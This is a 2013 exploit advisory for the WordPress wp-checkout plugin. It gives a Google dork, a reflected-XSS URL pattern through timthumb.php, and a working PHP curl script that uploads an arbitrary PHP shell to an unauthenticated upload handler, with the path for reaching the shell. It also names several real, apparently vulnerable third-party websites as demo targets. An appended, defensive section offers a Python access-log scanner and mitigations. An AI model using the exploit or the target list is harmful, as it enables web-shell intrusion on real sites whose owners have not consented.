#Title : Wordpress Plugin wp-checkout XSS / Arbitrary File Upload
#Author : DevilScreaM
#Date : 10/31/2013
#Category : Web Applications
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerability : XSS, Arbitrary File Upload
#Dork : inurl:wp-content/plugins/wp-checkout

Cross Site Scripting

The bundled TimThumb script reflects its src parameter into the response without encoding it:

http://site-target/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=[XSS]

Example

http://osteopathywinchester.co.uk/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>
http://pacificcrest.org/wp-content/plugins/wp-checkout/vendors/timthumb.php?src=<h1>DevilScreaM</h1>

Solution

Upgrade TimThumb to the current version, or delete timthumb.php.

=================================================================================================

Arbitrary File Upload

The bundled ajaxupload handler accepts an unauthenticated multipart POST (the Filedata field) and writes the file to the directory named in the folder field, with no file-type check:

Exploit :

http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php

<?php
// Local file to send; it is stored under wp-content/uploads/wp-checkout/ with its name unchanged
$uploadfile = "devilscream.php";

$ch = curl_init("http://site-target/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// Multipart POST: 'Filedata' carries the file (the "@file" form is the pre-PHP 5.5 curl upload syntax),
// 'folder' is the destination directory the handler writes to
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => "@$uploadfile",
    'folder'   => '/wp-content/uploads/wp-checkout/'
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// The handler's response (the stored file name on success)
print "$postResult";
?>

Shell Access :

http://site-target/wp-content/uploads/wp-checkout/devilscream.php

Demo :

http://prittybypri.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://windham73.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://twobuttons.com/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://riosdeaguavivaupci.com/hp_wordpress/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://brookesprevention.org/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
http://theheartofawoman.net/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php
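For site owners checking whether either issue above has been hit, the following is an added detection example (not part of the advisory) that scans Apache combined-format access logs for the three traces this advisory implies: a timthumb.php request whose src parameter carries HTML markup, a POST to the ajaxupload handler, and a PHP file being requested from the wp-checkout upload directory. The log lines, IPs and host names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format); IPs and paths are made up for the example.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Oct/2013:10:01:02 +0000] "GET /wp-content/plugins/wp-checkout/vendors/timthumb.php?src=%3Ch1%3Etest%3C/h1%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [31/Oct/2013:10:01:09 +0000] "POST /wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php HTTP/1.1" 200 64 "-" "curl/7.30.0"
203.0.113.5 - - [31/Oct/2013:10:01:15 +0000] "GET /wp-content/uploads/wp-checkout/x.php HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Oct/2013:10:02:00 +0000] "GET /wp-content/plugins/wp-checkout/vendors/timthumb.php?src=http://example.com/a.jpg HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Oct/2013:10:02:30 +0000] "GET /wp-content/uploads/wp-checkout/photo.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Pulls client IP, timestamp, method, request target and status out of a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TIMTHUMB = "/wp-content/plugins/wp-checkout/vendors/timthumb.php"
UPLOAD = "/wp-content/plugins/wp-checkout/vendors/ajaxupload/upload.php"
UPLOAD_DIR = "/wp-content/uploads/wp-checkout/"
SCRIPT_EXTS = (".php", ".phtml", ".php5")


def classify(line):
    """Return a finding label for one access-log line, or None when nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, target = m.group("method"), m.group("target")
    parts = urlsplit(target)
    path = parts.path
    if path == TIMTHUMB:
        # Reflected XSS: flag any HTML tag in src once percent-encoding is removed
        for val in parse_qs(parts.query).get("src", []):
            if re.search(r"<[^>]*>", unquote(val)):
                return "timthumb-xss"
    elif path == UPLOAD and method == "POST":
        # Any POST to the unauthenticated upload handler is worth reviewing
        return "ajaxupload-post"
    elif path.startswith(UPLOAD_DIR) and path.lower().endswith(SCRIPT_EXTS):
        # A script being fetched from the upload directory suggests a planted file being executed
        return "php-in-upload-dir"
    return None


def scan(log_text):
    """Return (client_ip, label, status) for every suspicious line in the log text."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            m = LOG_RE.match(line)
            findings.append((m.group("ip"), label, m.group("status")))
    return findings
```

Beyond detection, the mitigations the advisory implies are to remove timthumb.php, put the upload handler behind authentication with an extension allow-list, and deny script execution under wp-content/uploads at the web server.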